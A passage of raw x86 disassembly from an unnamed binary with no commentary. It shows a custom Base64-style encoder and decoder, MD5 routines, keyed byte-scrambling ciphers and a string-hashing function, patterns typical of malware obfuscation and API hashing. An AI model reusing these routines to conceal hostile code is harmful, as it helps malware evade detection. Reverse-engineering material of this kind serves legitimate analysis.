loc_40E87A: ; CODE XREF: sub_40E618+253�j
cmp [ebp+var_114C], 80h
jge loc_40E90F
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
movsx eax, byte ptr [eax]
cmp eax, 21h
jnz short loc_40E8B6
mov [ebp+var_88], 1
mov eax, [ebp+var_114C]
and byte ptr [ebp+eax+var_88+3], 0
loc_40E8B6: ; CODE XREF: sub_40E618+284�j
cmp [ebp+var_88], 0
jnz short loc_40E8DA
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
mov ecx, [ebp+var_114C]
mov al, [eax]
mov byte ptr [ebp+ecx+var_88+3], al
loc_40E8DA: ; CODE XREF: sub_40E618+2A5�j
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
mov ecx, [ebp+var_114C]
mov al, [eax]
mov [ebp+ecx+var_1109], al
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40E90A
jmp short loc_40E90F
; ---------------------------------------------------------------------------
loc_40E90A: ; CODE XREF: sub_40E618+2EE�j
jmp loc_40E86D
; ---------------------------------------------------------------------------
loc_40E90F: ; CODE XREF: sub_40E618+26C�j
; sub_40E618+2F0�j
and [ebp+var_5], 0
and [ebp+var_1089], 0
lea eax, [ebp+var_118C]
push eax
lea eax, [ebp+var_1148]
push eax
lea eax, [ebp+var_1108]
push eax
lea eax, [ebp+var_84]
push eax
push [ebp+var_4]
call sub_40D871
add esp, 14h
locret_40E941: ; CODE XREF: sub_40E618:loc_40E686�j
leave
retn
sub_40E618 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E943 proc near ; CODE XREF: sub_4167F1+2C9�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_40E94E: ; CODE XREF: sub_40E943+32�j
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40E960
jmp short locret_40E977
; ---------------------------------------------------------------------------
loc_40E960: ; CODE XREF: sub_40E943+19�j
push [ebp+var_8]
call sub_407B5E
pop ecx
mov [ebp+var_4], eax
push [ebp+var_8]
call sub_40E618
pop ecx
jmp short loc_40E94E
; ---------------------------------------------------------------------------
locret_40E977: ; CODE XREF: sub_40E943+1B�j
leave
retn
sub_40E943 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E979 proc near ; CODE XREF: sub_4167F1+E4�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40E98A
; ---------------------------------------------------------------------------
loc_40E983: ; CODE XREF: sub_40E979+24�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40E98A: ; CODE XREF: sub_40E979+8�j
cmp [ebp+var_4], 100h
jnb short loc_40E99F
mov eax, [ebp+var_4]
and byte_41E9B0[eax], 0
jmp short loc_40E983
; ---------------------------------------------------------------------------
loc_40E99F: ; CODE XREF: sub_40E979+18�j
and [ebp+var_4], 0
jmp short loc_40E9AC
; ---------------------------------------------------------------------------
loc_40E9A5: ; CODE XREF: sub_40E979+4C�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40E9AC: ; CODE XREF: sub_40E979+2A�j
cmp [ebp+var_4], 40h
jnb short locret_40E9C7
mov eax, [ebp+var_4]
movzx eax, byte_41A18C[eax]
mov cl, byte ptr [ebp+var_4]
mov byte_41E9B0[eax], cl
jmp short loc_40E9A5
; ---------------------------------------------------------------------------
locret_40E9C7: ; CODE XREF: sub_40E979+37�j
leave
retn
sub_40E979 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E9C9 proc near ; CODE XREF: sub_40A9CF+34C�p
; sub_40A9CF+E18�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 2
jnb short loc_40E9E8
xor eax, eax
jmp locret_40EB4C
; ---------------------------------------------------------------------------
loc_40E9E8: ; CODE XREF: sub_40E9C9+16�j
and [ebp+var_4], 0
and [ebp+var_8], 0
loc_40E9F0: ; CODE XREF: sub_40E9C9+17A�j
push 1
pop eax
test eax, eax
jz loc_40EB48
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
inc eax
cmp eax, [ebp+var_C]
jnb short loc_40EA29
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41E9B0[eax]
shl eax, 2
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx-1], al
jmp short loc_40EA2E
; ---------------------------------------------------------------------------
loc_40EA29: ; CODE XREF: sub_40E9C9+40�j
jmp loc_40EB48
; ---------------------------------------------------------------------------
loc_40EA2E: ; CODE XREF: sub_40E9C9+5E�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_40EA66
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41E9B0[eax]
sar eax, 4
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx-1]
or cl, al
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [eax-1], cl
jmp short loc_40EA6B
; ---------------------------------------------------------------------------
loc_40EA66: ; CODE XREF: sub_40E9C9+72�j
jmp loc_40EB48
; ---------------------------------------------------------------------------
loc_40EA6B: ; CODE XREF: sub_40E9C9+9B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
inc eax
cmp eax, [ebp+var_C]
jnb short loc_40EA99
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41E9B0[eax]
shl eax, 4
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx-1], al
jmp short loc_40EA9E
; ---------------------------------------------------------------------------
loc_40EA99: ; CODE XREF: sub_40E9C9+B0�j
jmp loc_40EB48
; ---------------------------------------------------------------------------
loc_40EA9E: ; CODE XREF: sub_40E9C9+CE�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_40EAD6
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41E9B0[eax]
sar eax, 2
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx-1]
or cl, al
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [eax-1], cl
jmp short loc_40EAD8
; ---------------------------------------------------------------------------
loc_40EAD6: ; CODE XREF: sub_40E9C9+E2�j
jmp short loc_40EB48
; ---------------------------------------------------------------------------
loc_40EAD8: ; CODE XREF: sub_40E9C9+10B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
inc eax
cmp eax, [ebp+var_C]
jnb short loc_40EB06
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41E9B0[eax]
shl eax, 6
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx-1], al
jmp short loc_40EB08
; ---------------------------------------------------------------------------
loc_40EB06: ; CODE XREF: sub_40E9C9+11D�j
jmp short loc_40EB48
; ---------------------------------------------------------------------------
loc_40EB08: ; CODE XREF: sub_40E9C9+13B�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_40EB3A
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx-1]
or cl, byte_41E9B0[eax]
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [eax-1], cl
jmp short loc_40EB3C
; ---------------------------------------------------------------------------
loc_40EB3A: ; CODE XREF: sub_40E9C9+14C�j
jmp short loc_40EB48
; ---------------------------------------------------------------------------
loc_40EB3C: ; CODE XREF: sub_40E9C9+16F�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
jmp loc_40E9F0
; ---------------------------------------------------------------------------
loc_40EB48: ; CODE XREF: sub_40E9C9+2C�j
; sub_40E9C9:loc_40EA29�j ...
mov eax, [ebp+var_4]
dec eax
locret_40EB4C: ; CODE XREF: sub_40E9C9+1A�j
leave
retn
sub_40E9C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EB4E proc near ; CODE XREF: sub_40A9CF+292�p
; sub_40A9CF+D12�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_4], 0
and [ebp+var_8], 0
and [ebp+var_C], 0
loc_40EB60: ; CODE XREF: sub_40EB4E:loc_40EC83�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movzx eax, byte ptr [eax]
sar eax, 2
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
shl eax, 4
and eax, 30h
mov [ebp+var_4], al
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnz short loc_40EBC2
movzx eax, [ebp+var_4]
or al, 1
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp loc_40EC88
; ---------------------------------------------------------------------------
loc_40EBC2: ; CODE XREF: sub_40EB4E+52�j
movzx eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx]
sar ecx, 4
and ecx, 0Fh
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
shl eax, 2
and eax, 3Ch
mov [ebp+var_4], al
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnz short loc_40EC2A
movzx eax, [ebp+var_4]
or al, 1
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_40EC88
; ---------------------------------------------------------------------------
loc_40EC2A: ; CODE XREF: sub_40EB4E+BD�j
movzx eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx]
sar ecx, 6
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movzx eax, byte ptr [eax]
and eax, 3Fh
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnz short loc_40EC83
jmp short loc_40EC88
; ---------------------------------------------------------------------------
loc_40EC83: ; CODE XREF: sub_40EB4E+131�j
jmp loc_40EB60
; ---------------------------------------------------------------------------
loc_40EC88: ; CODE XREF: sub_40EB4E+6F�j
; sub_40EB4E+DA�j ...
mov eax, [ebp+arg_4]
add eax, [ebp+var_C]
and byte ptr [eax], 0
mov eax, [ebp+var_C]
leave
retn
sub_40EB4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EC96 proc near ; CODE XREF: sub_40A9CF+2FA�p
; sub_40E618+FD�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_8], eax
and [ebp+var_4], 0
jmp short loc_40ECB4
; ---------------------------------------------------------------------------
loc_40ECAD: ; CODE XREF: sub_40EC96+3A�j
; sub_40EC96+4A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40ECB4: ; CODE XREF: sub_40EC96+15�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jge short loc_40ECE6
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
movzx eax, byte_41E9B0[eax]
test eax, eax
jz short loc_40ECD2
jmp short loc_40ECAD
; ---------------------------------------------------------------------------
loc_40ECD2: ; CODE XREF: sub_40EC96+38�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 41h
jnz short loc_40ECE2
jmp short loc_40ECAD
; ---------------------------------------------------------------------------
loc_40ECE2: ; CODE XREF: sub_40EC96+48�j
xor eax, eax
jmp short locret_40ECE9
; ---------------------------------------------------------------------------
loc_40ECE6: ; CODE XREF: sub_40EC96+24�j
push 1
pop eax
locret_40ECE9: ; CODE XREF: sub_40EC96+4E�j
leave
retn
sub_40EC96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ECEB proc near ; CODE XREF: sub_4167F1+FE�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
lea eax, [ebp+var_58]
push eax
call sub_40F11F
pop ecx
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_58]
push eax
call sub_40F159
add esp, 0Ch
lea eax, [ebp+var_58]
push eax
push offset byte_41EAB4
call sub_40F26E
pop ecx
pop ecx
lea eax, byte_41EAB4
push 10h
pop edx
loc_40ED29: ; CODE XREF: sub_40ECEB+46�j
mov cl, [eax]
rol cl, cl
mov [eax], cl
inc eax
dec edx
jnz short loc_40ED29
pop edi
pop esi
pop ebx
leave
retn
sub_40ECEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ED38 proc near ; CODE XREF: sub_40A9CF+14�p
; sub_41113B+159�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
xor ecx, ecx
xor eax, eax
loc_40ED45: ; CODE XREF: sub_40ED38+2F�j
mov cl, [esi]
test ecx, ecx
jz short loc_40ED69
cmp ecx, 61h
jb short loc_40ED53
sub ecx, 20h
loc_40ED53: ; CODE XREF: sub_40ED38+16�j
and ecx, 7Fh
add eax, ecx
and ecx, 0Fh
mov cl, byte_41EAB4[ecx]
add eax, ecx
rol eax, 3
inc esi
jmp short loc_40ED45
; ---------------------------------------------------------------------------
loc_40ED69: ; CODE XREF: sub_40ED38+11�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40ED38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ED6E proc near ; CODE XREF: sub_4167F1+10C�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
lea eax, [ebp+var_58]
push eax
call sub_40F11F
pop ecx
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_58]
push eax
call sub_40F159
add esp, 0Ch
lea eax, [ebp+var_58]
push eax
push offset dword_41EAC8
call sub_40F26E
pop ecx
pop ecx
lea esi, dword_41EAC8
mov edi, esi
push 10h
pop ecx
loc_40EDAE: ; CODE XREF: sub_40ED6E+48�j
lodsb
xor al, 0AAh
add al, al
or al, 1
stosb
loop loc_40EDAE
pop edi
pop esi
pop ebx
leave
retn
sub_40ED6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EDBD proc near ; CODE XREF: sub_40EF29+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40EDCE
; ---------------------------------------------------------------------------
loc_40EDC7: ; CODE XREF: sub_40EDBD+AF�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40EDCE: ; CODE XREF: sub_40EDBD+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jge locret_40EE71
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
sub al, 33h
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_8]
mov al, [eax]
sub al, [ecx+edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
not eax
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov cl, [ecx]
xor cl, al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov [eax], cl
mov eax, [ebp+arg_4]
cdq
push 10h
pop ecx
idiv ecx
shl edx, 2
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, dl
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
add al, 1
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp loc_40EDC7
; ---------------------------------------------------------------------------
locret_40EE71: ; CODE XREF: sub_40EDBD+17�j
leave
retn
sub_40EDBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EE73 proc near ; CODE XREF: sub_40EF41+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40EE84
; ---------------------------------------------------------------------------
loc_40EE7D: ; CODE XREF: sub_40EE73+AF�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40EE84: ; CODE XREF: sub_40EE73+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jge locret_40EF27
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
sub al, 1
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+arg_4]
cdq
push 10h
pop ecx
idiv ecx
shl edx, 2
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, dl
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
not eax
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov cl, [ecx]
xor cl, al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov [eax], cl
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_8]
mov al, [eax]
add al, [ecx+edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
add al, 33h
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp loc_40EE7D
; ---------------------------------------------------------------------------
locret_40EF27: ; CODE XREF: sub_40EE73+17�j
leave
retn
sub_40EE73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF29 proc near ; CODE XREF: sub_40A9CF+25D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_41EAC8
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40EDBD
add esp, 0Ch
pop ebp
retn
sub_40EF29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF41 proc near ; CODE XREF: sub_40A9CF+380�p
; sub_40D871+7AD�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_41EAC8
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40EE73
add esp, 0Ch
pop ebp
retn
sub_40EF41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF59 proc near ; CODE XREF: sub_40A9CF+271�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_4]
push [ebp+arg_0]
mov eax, [ebp+arg_0]
add eax, 4
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
call sub_410422
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, 4
mov [ebp+arg_0], eax
and [ebp+var_8], 0
jmp short loc_40EF91
; ---------------------------------------------------------------------------
loc_40EF8A: ; CODE XREF: sub_40EF59+7E�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40EF91: ; CODE XREF: sub_40EF59+2F�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jge short loc_40EFD9
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
add al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
push 1
push [ebp+var_4]
call sub_416DF6 ; _lrotl
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
jmp short loc_40EF8A
; ---------------------------------------------------------------------------
loc_40EFD9: ; CODE XREF: sub_40EF59+3E�j
mov eax, [ebp+arg_4]
dec eax
mov [ebp+var_8], eax
jmp short loc_40EFE9
; ---------------------------------------------------------------------------
loc_40EFE2: ; CODE XREF: sub_40EF59+D4�j
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
loc_40EFE9: ; CODE XREF: sub_40EF59+87�j
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_40F02F
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
add al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
push 1
push [ebp+var_4]
call sub_416DF6 ; _lrotl
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
jmp short loc_40EFE2
; ---------------------------------------------------------------------------
loc_40F02F: ; CODE XREF: sub_40EF59+94�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
mov [eax-4], ecx
mov eax, [ebp+arg_4]
add eax, 4
leave
retn
sub_40EF59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F040 proc near ; CODE XREF: sub_40A9CF+366�p
; sub_40D871+792�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
sub eax, 4
push eax
mov eax, [ebp+arg_0]
add eax, 4
push eax
push [ebp+arg_0]
call sub_416E02 ; memmove
add esp, 0Ch
mov eax, [ebp+arg_4]
sub eax, 4
mov [ebp+arg_4], eax
and [ebp+var_8], 0
jmp short loc_40F07C
; ---------------------------------------------------------------------------
loc_40F075: ; CODE XREF: sub_40F040+82�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40F07C: ; CODE XREF: sub_40F040+33�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jge short loc_40F0C4
mov eax, [ebp+var_4]
sub eax, [ebp+var_8]
mov [ebp+var_4], eax
push 1
push [ebp+var_4]
call sub_416DFC ; _lrotr
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
sub al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
jmp short loc_40F075
; ---------------------------------------------------------------------------
loc_40F0C4: ; CODE XREF: sub_40F040+42�j
mov eax, [ebp+arg_4]
dec eax
mov [ebp+var_8], eax
jmp short loc_40F0D4
; ---------------------------------------------------------------------------
loc_40F0CD: ; CODE XREF: sub_40F040+D8�j
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
loc_40F0D4: ; CODE XREF: sub_40F040+8B�j
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_40F11A
mov eax, [ebp+var_4]
sub eax, [ebp+var_8]
mov [ebp+var_4], eax
push 1
push [ebp+var_4]
call sub_416DFC ; _lrotr
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
sub al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
jmp short loc_40F0CD
; ---------------------------------------------------------------------------
loc_40F11A: ; CODE XREF: sub_40F040+98�j
mov eax, [ebp+arg_4]
leave
retn
sub_40F040 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F11F proc near ; CODE XREF: sub_40ECEB+D�p
; sub_40ED6E+D�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov dword ptr [eax], 67452301h
mov eax, [ebp+arg_0]
mov dword ptr [eax+4], 0EFCDAB89h
mov eax, [ebp+arg_0]
mov dword ptr [eax+8], 98BADCFEh
mov eax, [ebp+arg_0]
mov dword ptr [eax+0Ch], 10325476h
mov eax, [ebp+arg_0]
and dword ptr [eax+10h], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+14h], 0
pop ebp
retn
sub_40F11F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F159 proc near ; CODE XREF: sub_40ECEB+1D�p
; sub_40ED6E+1D�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax+10h]
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax*8]
mov ecx, [ebp+arg_0]
mov [ecx+10h], eax
mov eax, [ebp+arg_0]
mov eax, [eax+10h]
cmp eax, [ebp+var_4]
jnb short loc_40F18E
mov eax, [ebp+arg_0]
mov eax, [eax+14h]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+14h], eax
loc_40F18E: ; CODE XREF: sub_40F159+26�j
mov eax, [ebp+arg_8]
shr eax, 1Dh
mov ecx, [ebp+arg_0]
mov ecx, [ecx+14h]
add ecx, eax
mov eax, [ebp+arg_0]
mov [eax+14h], ecx
mov eax, [ebp+var_4]
shr eax, 3
and eax, 3Fh
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_40F21C
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax+18h]
mov [ebp+var_8], eax
push 40h
pop eax
sub eax, [ebp+var_4]
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
cmp eax, [ebp+var_4]
jnb short loc_40F1E8
push [ebp+arg_8]
